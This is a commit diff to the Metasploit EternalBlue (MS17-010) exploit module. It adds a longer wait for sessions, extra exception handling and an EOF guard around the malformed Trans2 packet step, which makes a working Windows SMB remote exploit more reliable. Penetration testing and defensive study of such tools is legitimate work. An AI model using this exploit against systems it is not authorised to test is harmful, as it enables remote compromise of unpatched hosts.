Tweak exception handling and timing of `ms17_010_eternalblue`

2018-02-21 13:40:04 -06:00 · 2018-02-21 13:40:04 -06:00 · af45c1764b
parent 78822fd799
commit af45c1764b
1 changed files with 19 additions and 5 deletions
--- a/modules/exploits/windows/smb/ms17_010_eternalblue.rb
+++ b/modules/exploits/windows/smb/ms17_010_eternalblue.rb
@ -59,7 +59,8 @@ class MetasploitModule < Msf::Exploit::Remote
        ],
      'DefaultOptions' =>
        {
-          'EXITFUNC' => 'thread',
+          'EXITFUNC'   => 'thread',
+          'WfsDelay'  => 5,
        },
      'Privileged'     => true,
      'Payload'        =>
@ -120,7 +121,7 @@ class MetasploitModule < Msf::Exploit::Remote
        # we don't need this sleep, and need to find a way to remove it
        # problem is session_count won't increment until stage is complete :\
        secs = 0
-        while !session_created? and secs < 5
+        while !session_created? and secs < 30
          secs += 1
          sleep 1
        end
@ -139,16 +140,24 @@ class MetasploitModule < Msf::Exploit::Remote

    rescue EternalBlueError => e
      print_error("#{e.message}")
+      return false
+    rescue ::RubySMB::Error::NegotiationFailure
+      print_error("SMB Negotiation Failure -- this often occurs when lsass crashes.  The target may reboot in 60 seconds.")
+      return false
    rescue  ::RubySMB::Error::UnexpectedStatusCode,
            ::Errno::ECONNRESET,
            ::Rex::HostUnreachable,
            ::Rex::ConnectionTimeout,
-            ::Rex::ConnectionRefused  => e
+            ::Rex::ConnectionRefused,
+            ::RubySMB::Error::CommunicationError => e
      print_error("#{e.class}: #{e.message}")
+      report_failure
+      return false
    rescue => error
      print_error(error.class.to_s)
      print_error(error.message)
      print_error(error.backtrace.join("\n"))
+      return false
    ensure
      # pass
    end
@ -286,6 +295,7 @@ class MetasploitModule < Msf::Exploit::Remote
    end
  end

+  '''
  #
  # Increase the default delay by five seconds since some kernel-mode
  # payloads may not run immediately.
@ -293,7 +303,7 @@ class MetasploitModule < Msf::Exploit::Remote
  def wfs_delay
    super + 5
  end
-
+  '''

  def smb2_grooms(grooms, payload_hdr_pkt)
    grooms.times do |groom_id|
@ -337,7 +347,11 @@ class MetasploitModule < Msf::Exploit::Remote
    vprint_status("Sending malformed Trans2 packets")
    sock.put(trans2_pkt_nulled)

-    sock.get_once
+    begin
+      sock.get_once
+    rescue EOFError
+      vprint_error("No response back from SMB echo request.  Continuing anyway...")
+    end

    client.echo(count:1, data: "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00")
  end